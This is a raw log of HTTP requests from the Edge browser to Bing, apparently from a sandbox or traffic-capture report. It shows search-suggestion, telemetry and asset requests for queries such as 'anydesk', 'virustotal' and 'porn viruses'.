GET https://www.bing.com/th?id=OSK.2d7b7af86f9a55648a4aec7fbe3969e6&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/ipv6test/test?FORM=MONITR

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3A%2Ci%3A11%22%2C%22AsResponseLength%22%3A%221031%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144337266%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22Michael%20Schumacher%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144337266%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A11%2Cig%3A2E639ED15AC64B9199100E3CDFA13BAC%22%2C%22AnswerInfo%22%3A%22MB%3B18%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144337266%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apor%2Ci%3A9%22%2C%22AsResponseLength%22%3A%22908%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144337438%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A9%2Cig%3AC36DA702B7A04E1B97CA1C21988DEDFC%22%2C%22AnswerInfo%22%3A%22AS%3B13%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144337438%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.f0690ff9596219946e86eee3c58d935c&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.4d68e57b31307fc5c39fd5aeaea6d241&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Av%2Ci%3A13%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144339405%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Av%2Ci%3A12%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144339406%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Av%2Ci%3A12%22%2C%22AsResponseLength%22%3A%221102%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144339517%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Av%2Ci%3A12%2Cig%3AC5AA6F18678F438AAD7FC2BF04C3BD03%22%2C%22AnswerInfo%22%3A%22AS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144339517%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avi%2Ci%3A14%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144340057%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avi%2Ci%3A13%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144340115%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avi%2Ci%3A13%22%2C%22AsResponseLength%22%3A%221258%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144340255%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22vinted%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144340255%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avi%2Ci%3A13%2Cig%3A998B90648DA7405F8BEC8E26DD2BD9BE%22%2C%22AnswerInfo%22%3A%22MB%3B6%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144340255%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avir%2Ci%3A15%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144340738%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350727%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=anyddes&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=e8d253d92907427684e76f05eb2f7e51&oit=1&cp=7&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=anyddesk&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=3b1307b24f4241d9a367b37ccea69d11&oit=1&cp=8&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:213,%22BC%22:213,%22SE%22:-1,%22TC%22:-1,%22H%22:278,%22BP%22:492,%22CT%22:496,%22IL%22:1},%22ad%22:[-1,-1,1263,609,1263,1890,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144460931%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22200%22%2C%22Downlink%22%3A%226.3%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1728144460931%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1728144461080%2C%22Name%22%3A1262%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461082%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461084%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/rewardsapp/ncheader?ver=50184609&IID=SERP.5051&IG=4B36F2F1B3E84114BE48F204E3D5D175

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461369%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200
92.123.128.189:443

https://www.bing.com/th?id=OSK.32czPnkmQbsB6BPhajLIFbee3m0hZkbPs4cjaXASMYo&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

tls, http

msedge.exe

15.0kB
10.3kB
23
28

HTTP Request

GET https://www.bing.com/sa/simg/favicon-trans-bg-000-mg.ico

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332049%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1728144332247%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144332371%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=po&cp=2&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.32czPnkmQbsB6BPhajLIFbee3m0hZkbPs4cjaXASMYo&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS
92.123.128.189:443

https://www.bing.com/fd/ls/lsp.aspx

tls, http

msedge.exe

53.5kB
53.6kB
80
102

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2212%22}]

HTTP Response

200

HTTP Request

POST https://www.bing.com/rewardsapp/reportActivity?IG=0DD30F05AB304142B388EAD39E0E9879&IID=SERP.5060&q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A5795%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1728144331983%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%22670163c530fd47b881461133ee19e33f%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144332000%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%22670163c530fd47b881461133ee19e33f%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144332000%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332037%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332049%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1728144332207%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%228211.5%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1728144332209%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%228479.5%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1728144332209%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.f640b1aecef558b8fb4493af14e8c6e3&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.2649f7e7cc97b3f670f28c0f227917e6&w=120&h=120&c=6&p=0&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.d0ba43380642895acb1ae9c6468a39dc&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.a65cf5186c4cac626439749c16b0c1f5&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.Ef6xyeDaKYpbQvn0wQ_puDAc7IZXvOSkyhMvbhhDQdY&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Avir%2Ci%3A14%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144340765%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avir%2Ci%3A14%22%2C%22AsResponseLength%22%3A%221157%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144340873%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22virustotal%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144340873%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avir%2Ci%3A14%2Cig%3AE3C0127DC5634E8293170B7F849179C5%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144340873%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviru%2Ci%3A16%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144342736%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviru%2Ci%3A15%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144342758%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruse&cp=6&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.608473fae4f44a9b3ff11d98cebf98f2&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruses%20&cp=8&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviruses%20%2Ci%3A20%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144344588%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20%2Ci%3A19%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144344604%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20%2Ci%3A19%22%2C%22AsResponseLength%22%3A%22463%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144344767%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20%2Ci%3A19%2Cig%3ACD15D5F022594609BCF8C4B2846709BA%22%2C%22AnswerInfo%22%3A%22MT%3B15%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144344767%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/GLinkPing.aspx?IG=ACC4C3B51F2946CCA132A82824F773C3&ID=autosuggest,5003.1&PR={%22i%22:%22m%22,%22ghc%22:1,%22et%22:1223}

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx
92.123.128.162:443

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=90&pcl=fffffa&r=0&o=6&pid=1.2

tls, http

msedge.exe

3.4kB
5.2kB
11
13

HTTP Request

GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=90&pcl=fffffa&r=0&o=6&pid=1.2
92.123.128.164:443

https://r.bing.com/rp/7lB-jK27Dd3_t3kGC3OY6DU6Cek.br.css

tls, http

msedge.exe

32.0kB
40.6kB
71
90

HTTP Request

GET https://r.bing.com/rp/kBFmfMwTm-h9PAKt-tzqA5YW52k.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rb/5W/cir3,cc,nc/S2YMC8NxUY-VQtAiYzxhzjDCV2E.css?bu=DZ9D-USdRqBG8kaKTrdQhwHwRb5DhwGoT4cB&or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/ILpAc2VIof0cr4Py3y4rAFMboow.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/_uzlXsRnS5Ra0MSF1ACv1JzUOlU.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/MQ6FjmtU3HtHUWBpUy7g5MH2bEs.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/xiLiwvf1fPHGHn1FtpBZ7OjyW7k.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/Yb-MiHwFpZo4XYbuuNLKCnyhd1M.gz.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/pXxJPt-kWYQnUnlxJybiIouKkzc.gz.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/95z5wMy4UcfbSSSlSw780vQ5jKA.jpg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/ni3MyKKVu9pK0SgY6gb6Z2NOGpg.jpg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/u9MH0YsDk2rD9WC1wmU_Hi2hXtM.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/rcJx5DodqqK-wxOI4K71tEgPVuE.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/J1CAvwnxXsmWnvoGjOAm14DdNQE.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/g8RFvmgwpBLY15PHz6aDHrBdIok.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/7lB-jK27Dd3_t3kGC3OY6DU6Cek.br.css

HTTP Response

200
92.123.128.164:443

https://r.bing.com/rp/cttnJ0tPw4WhtII_MMcYEf1T5wE.br.css

tls, http

msedge.exe

29.1kB
37.4kB
69
86

HTTP Request

GET https://r.bing.com/rp/dliRwIxSaWxw-rZZkpFj-NPxBOA.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rb/5U/cir3,cc,nc/x1GLwX6TA4Cg3KdvDSl85rMun2Q.css?bu=Bm9v_BKzFNAWbw&or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/sS9WdiLA9F38WKJqRP3fX-VP9Lo.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/10hV_LeOgcPE0OV6RmTIShvXtbQ.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/oovQ50wVYon598L2kxn0rbVAI0k.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/nORphXiTbdMbmmQtnuvni4eWmC0.gz.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/Fsa_OI0AplCnVoXGca8ALOo0S0s.svg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/hx-eea1zqtCz4K0bW2uH_oN7Fs4.jpg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/lvCKZ07bEYtoYmY62ifMzVa0RIE.jpg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/cRvrvrUA03NVEig8SXhQtErnYaM.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rb/4O/cc,nc/snnSLSAwgsOSJF1HZbQVd81R95o.css?bu=AqASrRI&or=w

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/oI5RhkwetxuVgfOww-Nc0yTFfkU.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/GwvTDzr-_7Ipq8Y_s09cnrmtIeY.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/cttnJ0tPw4WhtII_MMcYEf1T5wE.br.css

HTTP Response

200
92.123.128.164:443

https://r.bing.com/rp/HK3JWgw7vGok-S1ZNIRi81ouk9s.br.css

tls, http

msedge.exe

30.5kB
33.4kB
72
86

HTTP Request

GET https://r.bing.com/rb/5W/cc,nc/GZY3PyHImAjt56VIC2PBbIGPof4.css?bu=Ad0b&or=w

HTTP Response

200

